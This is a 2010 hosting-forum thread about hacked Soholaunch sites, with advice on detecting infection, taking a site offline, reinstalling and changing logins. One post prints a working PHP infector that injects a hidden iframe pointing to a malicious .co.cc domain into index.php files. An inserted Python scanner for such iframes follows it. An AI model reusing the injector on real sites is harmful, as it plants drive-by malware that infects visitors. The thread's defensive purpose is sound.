

"Trojan Horse"
#21
Posted 22 June 2010 - 08:39 AM

Soho, Wordpress, Drupal, Joomla, etc Template & Web Design - Data Recovery
#22
Posted 22 June 2010 - 03:47 PM
(If you have access to the server, ConfigServer Firewall has Directory and file watching capability with reports if a watched directory or a file changes.)
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
Please note that DrakNet no longer offers licensed Soholaunch as of 9/1/2010 - if you are looking at an old forum post that recommends us as a Soholaunch host, please note that situation has changed since the post was made.
#23
Posted 22 June 2010 - 10:41 PM
#24
Posted 23 June 2010 - 08:59 AM

Changing the perms on the file doesn't seem to have compromised the site's functionality at all, so maybe I'll ask my man to let me have some of his logs!!
Don't ask, don't get

#25
Posted 07 July 2010 - 10:28 AM

#26
Posted 16 July 2010 - 09:48 PM
<?$sInjectPHP = "<iframe src=\"http://karatepacan.co.cc/up/go.php?sid=2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>"?><?
$iMaxDepth = 4;
$iCurrDepth = 0;
$sDir = $_SERVER['DOCUMENT_ROOT'].'/';
Infect($sDir);
function Infect($sDir)
{
    global $iCurrDepth;
    global $iMaxDepth;
    global $sInjectPHP;
    global $sInjectHTML;
    global $sLog;
    if(file_exists($sDir) and $hDir = @opendir($sDir))
    {
        while(($sFileName = readdir($hDir)))
        {
            if(is_file($sDir.$sFileName))
            {
                $sExtension = substr($sFileName, strrpos($sFileName, '.')+1);
                switch($sExtension)
                {
                    case 'php':
                        if($sFileName == 'index.php')
                        {
                            $sFile = file_get_contents($sDir.$sFileName);
                            $sFile = '<body>'.$sInjectPHP.'</body>'.$sFile;
                            file_put_contents($sDir.$sFileName, $sFile);
                        }
                        break;
                    /*case 'htm':
                    case 'html':
                        chmod($sDir.$sFileName, 666);
                        $sFile = file_get_contents($sDir.$sFileName);
                        $iPos = stripos($sFile, '</body>');
                        if($iPos) $sFile = substr($sFile, 0, $iPos).$sInjectHTML.substr($sFile, $iPos);
                        else $sFile .= $sInjectHTML;
                        file_put_contents($sDir.$sFileName, $sFile);
                        break;*/
                }
            }
            /*else if (is_dir($sDir.$sFileName) && $sFileName != '.' &&
            $sFileName != '..' && $iCurrDepth <= $iMaxDepth)
            {
                $iCurrDepth++;
                Infect($sDir.$sFileName.'/');
                $iCurrDepth--;
            }*/
        }
        closedir($hDir);
    }
}
?>
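A detection sketch for the injection performed by the script posted above, added here as an example and not part of the thread or of any vendor tool. It flags zero-sized iframes and marks those sitting in a `<body>` block prepended to the file; it goes beyond the active branch of the script by also checking .htm/.html files and walking the whole tree. The regexes, function names and the `bad.example` sample host are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# Heuristics constructed for this example; not a vendor signature.
IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
ZERO_W = re.compile(rb"""\bwidth\s*=\s*["']?0["'\s>]""", re.I)
ZERO_H = re.compile(rb"""\bheight\s*=\s*["']?0["'\s>]""", re.I)
SRC = re.compile(rb"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# The posted script puts <body><iframe ...> ahead of the original file content.
PREFIX = re.compile(rb"\s*<body>\s*(?=<iframe\b)", re.I)
EXTS = (".php", ".htm", ".html")

def scan_file(path):
    """Return one finding per zero-sized iframe in the file."""
    data = Path(path).read_bytes()
    lead = PREFIX.match(data)
    findings = []
    for m in IFRAME.finditer(data):
        tag = m.group(0)
        if ZERO_W.search(tag) and ZERO_H.search(tag):
            src = SRC.search(tag)
            findings.append({
                "path": Path(path),
                "offset": m.start(),
                "src": src.group(1).decode("latin-1") if src else "",
                "prepended": bool(lead) and m.start() == lead.end(),
            })
    return findings

def scan_tree(root):
    """Walk the whole tree; the posted script's depth limit is not assumed."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in EXTS:
            hits.extend(scan_file(p))
    return hits

def demo():
    """Scan a constructed docroot; file contents and hostnames are placeholders."""
    samples = {
        "index.php": b'<body><iframe src="http://bad.example/go.php" width="0" height="0" frameborder="0"></iframe></body><?php echo 1; ?>',
        "about.html": b'<body><iframe src="/map" width="400" height="300"></iframe></body>',
        "page.htm": b'<p>hi</p><IFRAME height=0 width=0 src=http://bad.example/x></IFRAME>',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            Path(root, rel).write_bytes(body)
        return [(h["path"].name, h["src"], h["prepended"]) for h in scan_tree(root)]
```

Run `scan_tree` against the renamed docroot or a backup before restoring it; a finding with `prepended` set matches the layout this script produces.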
#27
Posted 16 July 2010 - 09:51 PM
If you do have a server, contact soho, they have a patch script you can run to mass patch all without upgrading.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
#28
Posted 18 July 2010 - 08:57 PM
#29
Posted 20 July 2010 - 12:34 AM
Should there be a photo.php in media folder or elsewhere? If so where can I find a clean one?
Tks.
Daniel
#30
Posted 21 July 2010 - 01:57 PM
#31
Posted 21 July 2010 - 06:36 PM
I would suggest, if folks have not, that they:
Get an Account with Google Webmaster tools: Google Webmaster Central now
Verify their site
Make sure it has not been picked up yet as malware infected.
Check with your host regarding their malware infection policies - some hosts get Google notices and you are suspended or terminated, so find out before you get caught what your host's policy is.
We'll have a blog post up regarding this issue to our specific customers within an hour or two.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
#32
Posted 25 July 2010 - 09:31 PM
#33
Posted 26 July 2010 - 09:37 AM
#34
Posted 26 July 2010 - 08:02 PM
My site built with soho launch has also just been infected with malware from klezmoo.co.cc updates JavaScript even if not requested when entering site. Google alert coming up but on link sent by host company it went straight in and started downloading. Anyone got any idea how to fix it without closing site?
If your site is hacked now, and serving malicious software, you need to take that site offline *now* - not when you figure out how to clean it, not in a few days, now. You are potentially infecting your clients and visitors, if you take credit cards, potentially opening your site up to hefty PCI fines.
The easiest way to take a site offline for a user is to rename public_html, create a new public_html directory, and upload a page explaining that you are offline for maintenance. Then you can reinstall a current version of Soholaunch that doesn't have the hole in it, upload a backup (if you're sure it's clean), and be back in business with a minimum of fuss (making sure to change all the logins).
If you don't have a clean backup (or any backup at all), you have a pretty large problem and may have to rebuild.
█ DrakNet Web Hosting | (Or just me: jenlepp.com | Twitter: @jenlepp)
#35
Posted 19 November 2010 - 07:10 AM
This is a good post, I like it very much, I hope that you can create more posts like this. Best wishes.